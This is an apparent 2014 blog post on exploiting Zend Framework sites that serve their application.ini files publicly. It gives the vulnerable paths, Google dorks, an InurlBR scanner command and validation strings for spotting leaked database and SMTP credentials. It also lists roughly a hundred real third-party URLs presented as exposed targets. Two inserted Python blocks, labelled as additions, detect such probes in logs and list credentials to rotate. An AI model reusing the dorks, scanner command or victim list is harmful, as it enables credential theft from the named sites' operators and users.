Wednesday, July 16, 2014

Exploiting the Zend Framework Full Info Disclosure flaw

This flaw exposes the .ini configuration files of web applications built on Zend Framework for anyone to read; those files contain the database and SMTP passwords.

Vulnerability[0]=> http://target.com/application/configs/{file}.ini
E.g.:
http://target.com/application/configs/application.ini
http://target.com/application/configs/db.ini
http://target.com/application/configs/config.ini

Inside such a file we can find the following parameters.


; Database access credentials
resources.db.params.host = "mysql.target.com.br"
resources.db.params.username = "root"
resources.db.params.password = "123455"

; And also SMTP access credentials
resources.mail.transport.host = "smtp.target.com.br"
resources.mail.transport.auth = "login"
resources.mail.transport.username = "wangxydlutre"
resources.mail.transport.password = "12333"


DORK[0]=> inurl:/application/configs/application.ini

DORK[1]=>
site:com ext:ini inurl:/application/  -inurl:"git*" -github -assembla -inurl:mozilla -inurl:google "params.password"

DORK[2]=> -site:.google.com -site:.github.com -site:.sourceforge.net -site:.googlecode.com inurl:/application/configs/ "params" ext:ini

DORK[3]=> inurl:/configs/ "params.password" db.ini ext:ini

DORK[4]=> -github.com -mozilla.org -.google.com inurl:/application/  ext:ini password



[+][ COMMAND SCANNER INURLBR ]
./inurlbr.php --dork 'site:com ext:ini inurl:/application/  -github -assembla -inurl:mozilla -inurl:svn "params.password"'  -s zend.txt -q 1,6,7,14,22
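Added example (not from the original post and not part of the InurlBR project): the dork-driven probing above leaves a distinctive trace in web server access logs, which is the place a defender should look for it. This Python script runs over a few constructed Apache combined-format lines (the addresses and paths are made up), flags every request for a .ini file under an application/ or configs/ path, counts probes per source address, and lists the paths that actually returned 200, i.e. the files that really are exposed and whose credentials must be rotated.

```python
import re
from collections import Counter

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Jul/2014:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Jul/2014:10:01:03 +0000] "GET /application/configs/application.ini HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
198.51.100.7 - - [16/Jul/2014:10:02:10 +0000] "GET /application/configs/db.ini? HTTP/1.1" 404 210 "-" "curl/7.35"
198.51.100.7 - - [16/Jul/2014:10:02:11 +0000] "GET /app/application/config/config.ini HTTP/1.1" 403 199 "-" "curl/7.35"
192.0.2.9 - - [16/Jul/2014:10:03:00 +0000] "GET /images/logo.png HTTP/1.1" 200 3400 "-" "Mozilla/5.0"
"""

# Minimal combined-log-format parser: source IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Any request for a .ini file below an application/ or config(s)/ directory,
# with or without a trailing "?" as seen in the dork results.
CONFIG_PROBE_RE = re.compile(r'/(?:application|configs?)/.*\.ini(?:\?.*)?$', re.IGNORECASE)


def find_config_probes(log_text):
    """Return one dict per log line that requests a framework config .ini file."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path = m.group("path")
        if CONFIG_PROBE_RE.search(path):
            hits.append({
                "ip": m.group("ip"),
                "path": path,
                "status": int(m.group("status")),
                # A 200 means the server actually handed the file out.
                "exposed": m.group("status") == "200",
            })
    return hits


def summarize(hits):
    """Count probes per source address and list the paths that were served (200)."""
    per_ip = Counter(h["ip"] for h in hits)
    exposed = sorted({h["path"] for h in hits if h["exposed"]})
    return per_ip, exposed


if __name__ == "__main__":
    probes = find_config_probes(SAMPLE_LOG)
    per_ip, exposed = summarize(probes)
    for ip, n in per_ip.most_common():
        print(f"{ip}: {n} config probe(s)")
    for path in exposed:
        print(f"EXPOSED (returned 200): {path}")
```

A 404 or 403 on these paths is a scan to note; a 200 is an incident, because the file contents (and every credential in them) must be assumed to be in the scanner's hands.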


[+][ VALIDATION ZEND FRAMEWORK ]
$validation['ZEND-FRAMEWORK-01'] = 'mail.transport.username';
$validation['ZEND-FRAMEWORK-02'] = 'mail.transport.password';
$validation['ZEND-FRAMEWORK-03'] = 'db.params.username';
$validation['ZEND-FRAMEWORK-04'] = 'db.params.password';
$validation['ZEND-FRAMEWORK-05'] = 'db.params.dbname';
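Added example (not from the original post): the validation strings above are the key names that identify a leaked Zend Framework 1 application.ini, and from the defender's side the same names tell an operator exactly what to rotate after an exposure like the one shown in the sample file earlier. This Python script parses a constructed ZF1-style INI (section inheritance written as [staging : production], dotted keys, quoted values; every value is a placeholder) and reports each key that carries a credential. The standard ZF1 layout keeps application/configs outside the public/ document root; the files in this post are readable because the whole project tree, not just public/, was placed under the web server's document root.

```python
import re

# Constructed sample application.ini in Zend Framework 1 style; all values are placeholders.
SAMPLE_INI = """\
[production]
phpSettings.display_errors = 0
resources.db.adapter = "PDO_MYSQL"
resources.db.params.host = "db.example.test"
resources.db.params.username = "appuser"
resources.db.params.password = "S3cret-placeholder"
resources.db.params.dbname = "appdb"
resources.mail.transport.host = "smtp.example.test"
resources.mail.transport.auth = "login"
resources.mail.transport.username = "mailer"
resources.mail.transport.password = "Mail-placeholder"
api.key = "abc123-placeholder"

[staging : production]
; staging inherits everything from production and overrides a few keys
phpSettings.display_errors = 1
resources.db.params.password = "Staging-placeholder"
"""

# Last path component of a key that indicates a credential (page's validation
# names plus a few common generic ones).
SECRET_KEY_RE = re.compile(
    r'(?:^|\.)(?:password|passwd|pwd|secret|apikey|api_key|key|token)$', re.IGNORECASE
)


def parse_zf_ini(text):
    """Parse a ZF1-style INI into {section: {key: value}}, resolving '[child : parent]' inheritance."""
    sections, parents, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue  # blank or comment line
        if line.startswith("[") and line.endswith("]"):
            name, _, parent = (p.strip() for p in line[1:-1].partition(":"))
            current = name
            sections[current] = {}
            if parent:
                parents[current] = parent
            continue
        key, _, value = line.partition("=")
        if current is None or not key.strip():
            continue
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]  # drop surrounding quotes
        sections[current][key.strip()] = value

    resolved = {}

    def resolve(name):
        # Child section starts from a copy of its parent, then overrides.
        if name in resolved:
            return resolved[name]
        merged = dict(resolve(parents[name])) if name in parents else {}
        merged.update(sections[name])
        resolved[name] = merged
        return merged

    for name in sections:
        resolve(name)
    return resolved


def find_secrets(sections):
    """Return [(section, key)] for every non-empty value whose key name denotes a credential."""
    return [
        (sec, key)
        for sec, kv in sections.items()
        for key, value in kv.items()
        if value and SECRET_KEY_RE.search(key)
    ]


def exposure_report(text):
    """What an operator must rotate if this file was ever served over HTTP."""
    sections = parse_zf_ini(text)
    secrets = find_secrets(sections)
    return {
        "sections": sorted(sections),
        "credentials_to_rotate": sorted({key for _, key in secrets}),
    }


if __name__ == "__main__":
    report = exposure_report(SAMPLE_INI)
    print("sections:", ", ".join(report["sections"]))
    for key in report["credentials_to_rotate"]:
        print("rotate:", key)
```

Because staging inherits from production, a leaked file usually discloses credentials for every environment it describes, not only the one the site runs in; the report therefore collects keys across all resolved sections.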

0xExample of a finding: zend

https://www.thoex.com/urrunarrak-handball/application/configs/application.ini?
https://www.thoex.com/urrunarrak2/application/configs/application.ini?
http://www.rydusa.com/application/configs/application.ini?
http://snobmonkey.com/test/application/configs/application.ini?
http://www.firecompanies.com/MFC/application/config/application.ini?
http://www.statzpack.com/soccer_web/soccer/application/config/config.ini?
http://danielberard.com/application/configs/application.ini?
http://www.kreatera.com/library/Benux/Application/configs/application.ini?
http://www.tremendosoftware.com/sms/application/configs/application.ini?
http://galaxybis.com/demos/zf1/application/configs/application.ini?
http://www.ovdev.mit-consult.com/orizonqs/application/configs/application.ini?
http://amdinner.com/admin/application/application.ini?
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini?
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini?
http://www.aps-cctv.com/boardPhotos/application.ini?
http://developer.camerocks.com/temp/newscan/application/configs/application.ini?
http://svn.turbocrms.com/trac/browser/clients/agencyengland/jorvik/backend/application/configs/application.ini?
http://www.comsucopia.com/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?


http://www.getsocialwithrb.com/rec0219/airwick/application/configs/application.ini
http://www.aps-cctv.com/boardPhotos/application.ini
http://snobmonkey.com/test/application/configs/application.ini
http://velcro-lab.com/touch/application/configs/application.ini
http://www.ratcmatrimony.com/application/configs/application.ini
http://ucgoz.com/deneme2/application/configs/application.ini
http://ifood.introserver.com/application/configs/application.ini
http://staging.gonabit.com/hintbased.com/admin/application/configs/application.ini
http://www.altusinfra.com/application/configs/application.ini
http://www.thenamesticker.com/application/configs/application.ini
http://stasdavydov.com/price_cmp/application/configs/application.ini
https://www.mitylite.com/application/configs/application.ini
http://dev.blancali.com/_old2/application/configs/application.ini
http://city-immobilier.com/application/configs/application.ini
http://www.emotionla.com/staging/vivanda/vivanda-mobile/application/configs/application.ini
http://23sec.com/api/application/configs/application.ini
https://xp-dev.com/sc/diff/71005/39/45//application/configs/application.ini
http://www.rydusa.com/application/configs/application.ini
http://www.prod2020.com/_hybris-cra/application/configs/application.ini
http://xolotlti.com/fabricadecine/application/configs/application.ini
http://www.test.unibox.com/application/configs/application.ini
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini
http://users.spytosave.com/spyapp/application/configs/application.ini
http://www.monigrafica.com/application/configs/application.ini
http://clossmancommunications.com/frapi/admin/application/config/application.ini
http://archi-tech-media.com/thedigitalkingdom/application/configs/application.ini
http://www.kreatera.com/library/Benux/Application/configs/application.ini
http://li258-109.members.linode.com/application/configs/application.ini
http://www.techques.com/question/1-4484965/How-to-set-database-time-zone-in-application.ini
http://bizarrefx.com/bfx/searchd/application/configs/application.ini
http://www.hellobrothers.com/jobs/application.ini
http://www.ovdev.mit-consult.com/exc1/application/configs/application.ini
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini
http://www.digilibro.com/Crisol/RestServer/application/configs/application.ini
http://secure.vfwebserver.com/ewe/application/configs/application.ini
http://ihuntyou.com/agrobrain/trunk/application/configs/application.ini
http://ronlinecdn.com/st/application/configs/application.ini
http://yodpolitician.yodsoft.com/application/configs/application.ini
http://kerberosdevelopment.com/centurion/application/configs/db.ini
http://www.dev-stagingserver.com/noophy/application/configs/application.ini
http://www.intell-sol.com/subdomains/wandelion/admin/application/configs/application.ini
http://paintourhome.com/application/configs/application.ini
http://www.mywebsitedemos.com/broomberg/application/configs/application.ini
http://fidelcrm.com/fbconnect/zblog/application/configs/application.ini
http://developermalik.com/chad/application/configs/application.ini
http://developermalik.com/uPolitics/application/configs/application.ini
http://km.comuf.com/application/configs/application.ini
http://qljsystems.com/doctrine2/ralphschindler-NOLASnowball-3c9f906/application/configs/application.ini
http://50-87-21-130.unifiedlayer.com/astonis/application/configs/application.ini
http://bepcongnghiepjsc.com/application/configs/application.ini
http://galaxybis.com/demos/zf1/application/configs/application.ini
http://masdag.com/watchit/application/configs/config.ini
http://www.comsucopia.com/application/configs/application.ini
http://campusrain.com/wow/application/configs/application.ini
http://www.myanmar-restaurants.com/updates/myanmar/stage/application/configs/sites/myanmar-updates.ini
http://churchcims.com/staging/application/configs/application.ini
http://hashib23.uniquewebers.com/hospital/application/configs/application.ini
http://support.orioly.com/svjetskiputnik.hr/application/configs/application.ini
http://tmh.riktamtech.com/blinkword/application/configs/application.ini
http://shopping.idincorp.com/application/configs/application.ini
https://www.arabforwarding.com/vhosts/loyacjordan.org/httpdocs/loyac/application/configs/application.ini
https://www.arabforwarding.com/vhosts/__www.fnms-medical.com/httpdocs/application/configs/application.ini
http://elamatute.com/application/configs/application.ini
http://www.originalsexnetwork.com/application/configs/application.ini
http://www.palstu.com/contactus2/application/configs/application.ini
http://web.ontuts.com/wp-content/uploads/tutoriales/zendframework/zendframework_layouts/application/config/application.ini
https://daralyasmine.com/vhosts/daralyasmine.com/httpdocs/application/configs/application.ini
http://www.tributosonline.com/application/configs/application.ini
http://www.nichequotes.com/zend/application/config.ini
http://webkathon.com/alumni/application/configs/application.ini
http://web1.kindlebit.com/PHP-Team/vijay/don/codecanyon-4210316-monsterfile-multiuser-file-management/MonsterFile/application/configs/monster.ini
http://www.investmysite.com/application/config/config_db.ini
http://dulichcampuchiagiare.com/application/configs/application.ini
http://eshopbox.com/checkout/application/configs/application.ini
http://www.oi915.com/application/modules/admin/application.ini
https://xp-dev.com/sc/71005/65//application/configs/application.ini
http://www.prod2020.com/france-tv/application/configs/db.ini
http://amdinner.com/admin/application/application.ini
http://www.emotionla.com/clientes/plazavea/plazavea-qr/application/configs/application.ini
http://staging.gonabit.com/hintbased.com/application/configs/application.ini
http://www.palstu.com/tawjihi/application/configs/application.ini
http://ronlinecdn.com/sap/application/configs/application.ini
http://myanmar-restaurants.com/updates/movie/prod/application/configs/sites/myanmar-updates.ini
Exploit:
http://www.exploit-db.com/exploits/29921/
